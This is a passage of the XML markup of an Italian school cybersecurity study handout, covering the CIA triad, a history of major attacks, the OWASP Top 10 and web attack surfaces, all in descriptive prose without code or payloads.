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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">CYBERSECURITY: ATTACCHI E DIFESE - MATERIALE DI STUDIO TPSIT</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SEZIONE 1: INTRODUZIONE ALLA CYBERSECURITY</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' la Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La cybersecurity e' l'insieme di tecnologie, processi e pratiche progettate per proteggere reti, computer, programmi e dati da attacchi, danni o accessi non autorizzati. Non si tratta solo di tecnologia: include anche le persone e i processi organizzativi. La cybersecurity e' diventata fondamentale nella societa' moderna perche' quasi ogni aspetto della nostra vita dipende da sistemi informatici, dalla sanita' alla finanza, dai trasporti alle comunicazioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il termine cybersecurity copre diverse sotto-discipline: sicurezza delle reti (protezione delle infrastrutture di comunicazione), sicurezza delle applicazioni (protezione del software da vulnerabilita'), sicurezza delle informazioni (protezione dei dati), disaster recovery (ripristino dopo incidenti), e business continuity (mantenimento delle operazioni durante crisi). Ogni organizzazione moderna deve implementare strategie di cybersecurity su tutti questi livelli.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La Triade CIA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il modello fondamentale della sicurezza informatica e' la triade CIA, che rappresenta i tre pilastri su cui si basa ogni sistema di sicurezza:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIALITY (Riservatezza): garantisce che le informazioni siano accessibili solo alle persone autorizzate. Si implementa attraverso crittografia, controlli di accesso, autenticazione e classificazione dei dati. Un esempio pratico e' la crittografia end-to-end nelle app di messaggistica, che impedisce a terzi di leggere i messaggi anche se intercettati. La violazione della riservatezza puo' portare a furto di identita', spionaggio industriale e danni reputazionali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INTEGRITY (Integrita'): assicura che i dati non vengano modificati in modo non autorizzato durante la memorizzazione o la trasmissione. Si implementa attraverso hash crittografici (SHA-256), firme digitali, checksum e controlli di versione. Un esempio e' l'uso di hash per verificare che un file scaricato non sia stato alterato. Se un attaccante modifica i dati di una transazione bancaria, sta violando l'integrita'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AVAILABILITY (Disponibilita'): garantisce che i sistemi e i dati siano accessibili quando necessario. Si implementa attraverso ridondanza, backup, bilanciamento del carico (load balancing), sistemi di failover e protezione contro attacchi DDoS (Distributed Denial of Service). Un attacco DDoS che rende un sito web irraggiungibile viola la disponibilita'. Anche un semplice guasto hardware che impedisce l'accesso ai dati e' un problema di disponibilita'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Questi tre principi sono interconnessi e spesso in tensione tra loro. Ad esempio, aumentare la sicurezza (confidentiality) con troppi controlli puo' ridurre la disponibilita' per gli utenti legittimi. Un buon sistema di sicurezza bilancia tutti e tre gli aspetti.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Breve Storia degli Attacchi Informatici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1988 - Morris Worm: il primo worm diffuso su Internet, creato da Robert Tappan Morris. Infetto' circa 6000 computer (il 10% di Internet dell'epoca), causando danni stimati tra 100.000 e 10 milioni di dollari. Porto' alla creazione del CERT (Computer Emergency Response Team).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2000 - ILOVEYOU: un worm che si diffondeva via email con l'oggetto 'ILOVEYOU'. Infetto' decine di milioni di computer in poche ore, causando danni stimati in 10 miliardi di dollari. Dimostro' l'efficacia del social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2010 - Stuxnet: il primo malware progettato specificamente per attaccare sistemi industriali (SCADA). Attribuito a USA e Israele, danneggio' le centrifughe nucleari iraniane. Segno' l'inizio dell'era della cyber-warfare, dimostrando che gli attacchi informatici possono causare danni fisici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2013 - Target Data Breach: attacco a catena di fornitura che compromise 40 milioni di carte di credito. Gli attaccanti entrarono attraverso un fornitore di sistemi HVAC (riscaldamento/condizionamento) che aveva accesso alla rete di Target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2017 - WannaCry: ransomware che sfruttava una vulnerabilita' di Windows (EternalBlue, rubata alla NSA). Infetto' oltre 230.000 computer in 150 paesi, paralizzando ospedali del NHS britannico, fabbriche Renault e molte altre organizzazioni. Dimostro' l'importanza di applicare le patch di sicurezza tempestivamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2020 - SolarWinds: attacco alla supply chain del software. Gli attaccanti compromisero il sistema di aggiornamento di SolarWinds Orion, distribuendo malware a 18.000 organizzazioni tra cui agenzie governative USA e aziende Fortune 500. E' considerato uno degli attacchi piu' sofisticati della storia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2021 - Attacco alla Regione Lazio: un attacco ransomware che blocco' il sistema di prenotazione dei vaccini COVID-19 e molti servizi regionali per settimane. L'attacco parti' dalla VPN di un dipendente della regione. Dimostro' che anche le PA italiane sono vulnerabili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2023 - MOVEit: vulnerabilita' SQL injection nel software MOVEit Transfer, sfruttata dal gruppo Cl0p per rubare dati da centinaia di organizzazioni, tra cui Shell, BBC, British Airways e diverse agenzie governative.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Casi Reali di Attacchi Informatici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WannaCry (2017): il ransomware sfruttava l'exploit EternalBlue (vulnerabilita' SMBv1 di Windows, MS17-010). Microsoft aveva rilasciato la patch due mesi prima, ma milioni di sistemi non erano aggiornati. L'attacco fu fermato quasi per caso da un ricercatore (MalwareTech) che scopri' un kill switch nel dominio di comando e controllo. Danno stimato: oltre 4 miliardi di dollari globalmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacco Regione Lazio (2021): l'attaccante ottenne le credenziali VPN di un dipendente regionale (probabilmente tramite phishing o credential stuffing). Da li' esegui' un lateral movement nella rete interna fino a raggiungere i sistemi critici. Il ransomware cripto' i dati e chiese un riscatto. I backup erano collegati alla stessa rete e furono anch'essi compromessi. Il recupero richiese settimane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SolarWinds (2020): gli attaccanti (attribuiti al gruppo russo APT29/Cozy Bear) compromisero il processo di build del software Orion. Inserirono codice malevolo (SUNBURST) che veniva distribuito come aggiornamento legittimo. Il malware rimase dormiente per due settimane prima di attivarsi, comunicando con server C2 tramite DNS. L'attacco fu scoperto da FireEye quando noto' accessi anomali ai propri sistemi.</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2: OWASP TOP 10</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (Open Web Application Security Project) e' una fondazione no-profit dedicata al miglioramento della sicurezza del software. Fondata nel 2001, OWASP produce guide, strumenti, metodologie e standard utilizzati in tutto il mondo. Il progetto piu' noto e' la OWASP Top 10, una classifica delle 10 vulnerabilita' piu' critiche delle applicazioni web, aggiornata periodicamente sulla base di dati reali raccolti da centinaia di organizzazioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La Top 10 e' un documento di consapevolezza per gli sviluppatori e le organizzazioni. Non e' una lista esaustiva di tutti i rischi, ma rappresenta un consenso ampio sui rischi di sicurezza piu' critici. Molti standard di sicurezza (come PCI DSS per i pagamenti) richiedono esplicitamente la protezione contro le vulnerabilita' della OWASP Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (2021) - Lista Completa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A01 - Broken Access Control: era al quinto posto nel 2017, ora e' la vulnerabilita' numero uno. Si verifica quando gli utenti possono accedere a risorse o funzionalita' al di fuori dei loro permessi. Esempi: un utente normale che accede al pannello admin modificando l'URL, IDOR (Insecure Direct Object Reference) dove si possono vedere dati di altri utenti cambiando un parametro ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A02 - Cryptographic Failures: precedentemente nota come 'Sensitive Data Exposure'. Riguarda l'uso inadeguato o assente della crittografia per proteggere dati sensibili. Esempi: password salvate in chiaro nel database, comunicazioni non cifrate (HTTP invece di HTTPS), uso di algoritmi crittografici obsoleti (MD5, SHA-1 per password).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A03 - Injection: include SQL Injection, NoSQL Injection, OS Command Injection, LDAP Injection. Si verifica quando dati non fidati vengono inviati a un interprete come parte di un comando o query. E' la categoria di vulnerabilita' che studieremo piu' in dettaglio nelle demo pratiche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A04 - Insecure Design: categoria nuova nel 2021, riguarda difetti di progettazione e architettura, non bug di implementazione. Si riferisce alla mancanza di security controls gia' in fase di progettazione. Esempio: un sistema di recupero password basato su domande di sicurezza (le cui risposte si possono trovare sui social media).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A05 - Security Misconfiguration: configurazioni errate o di default che espongono il sistema. Esempi: account di default non rimossi (admin/admin), directory listing attivo sul server web, messaggi di errore dettagliati visibili agli utenti (che rivelano informazioni sull'architettura), header HTTP di sicurezza mancanti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A06 - Vulnerable and Outdated Components: uso di librerie, framework o componenti software con vulnerabilita' note. Esempio: usare una versione di Apache Struts con una RCE nota (come nel caso Equifax 2017 che espose i dati di 147 milioni di persone). E' fondamentale mantenere aggiornate tutte le dipendenze.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A07 - Identification and Authentication Failures: problemi nel sistema di autenticazione. Esempi: permettere attacchi brute force senza rate limiting, accettare password deboli, sessioni che non scadono, token di sessione prevedibili, mancanza di Multi-Factor Authentication (MFA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A08 - Software and Data Integrity Failures: codice e infrastruttura che non proteggono contro violazioni dell'integrita'. Esempi: aggiornamenti software non verificati (come nel caso SolarWinds), pipeline CI/CD non sicure, deserializzazione insicura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A09 - Security Logging and Monitoring Failures: logging insufficiente, monitoraggio inadeguato e risposta agli incidenti inefficace. Se non registri gli eventi di sicurezza e non li monitori, un attaccante puo' operare indisturbato per settimane o mesi. Il tempo medio di rilevamento di una breach e' di 207 giorni (IBM Cost of Data Breach Report).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 - Server-Side Request Forgery (SSRF): si verifica quando un'applicazione web recupera una risorsa remota senza validare l'URL fornito dall'utente. L'attaccante puo' forzare il server a fare richieste verso destinazioni interne (localhost, servizi interni) o esterne arbitrarie, bypassando firewall e controlli di rete.</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3: ARCHITETTURA WEB E SUPERFICI DI ATTACCO</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Il Modello Client-Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'architettura web si basa sul modello client-server. Il client (tipicamente un browser web) invia richieste al server, che le elabora e restituisce una risposta. Questa comunicazione avviene attraverso il protocollo HTTP/HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il flusso tipico e': 1) Il browser invia una richiesta HTTP al server (es. GET /pagina.html). 2) Il server riceve la richiesta e la elabora. 3) Se necessario, il server interroga il database. 4) Il server costruisce la risposta (HTML, JSON, ecc.). 5) La risposta viene inviata al browser. 6) Il browser renderizza la pagina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP e' un protocollo stateless, cioe' ogni richiesta e' indipendente dalle precedenti. Il server non 'ricorda' le richieste passate. Per mantenere lo stato (ad esempio, la sessione di login), si usano meccanismi come cookie, token JWT o sessioni server-side. Questa natura stateless ha importanti implicazioni per la sicurezza: i cookie di sessione vengono inviati automaticamente dal browser ad ogni richiesta, il che rende possibili attacchi come il CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Richieste HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una richiesta HTTP e' composta da: metodo (GET, POST, PUT, DELETE, ecc.), URL (il percorso della risorsa), headers (metadati come Content-Type, Cookie, Authorization), e opzionalmente un body (il contenuto della richiesta, usato con POST e PUT).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET: richiede una risorsa. I parametri sono nell'URL (?chiave=valore). Non dovrebbe modificare dati. E' visibile nella barra degli indirizzi, nella cronologia e nei log del server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">POST: invia dati al server (form, JSON, ecc.). I parametri sono nel body della richiesta, non nell'URL. Usato per login, invio form, creazione di risorse. I dati nel body non sono visibili nell'URL ma NON sono cifrati senza HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I cookie sono piccoli dati che il server invia al browser e che il browser reinvia automaticamente ad ogni richiesta successiva allo stesso dominio. Sono il meccanismo principale per gestire le sessioni (il server invia un cookie di sessione dopo il login, e il browser lo include in tutte le richieste successive, dimostrando che l'utente e' autenticato).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Superfici di Attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La superficie di attacco e' l'insieme di tutti i punti in cui un attaccante puo' tentare di inserire dati malevoli o estrarre informazioni. Nell'architettura web, le principali superfici sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input dell'utente: tutto cio' che l'utente puo' inserire e inviare al server. Questo include form di login, barre di ricerca, campi di commento, upload di file, parametri URL, cookie manipolati, header HTTP personalizzati. Ogni input non validato e' una potenziale porta d'ingresso per un attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
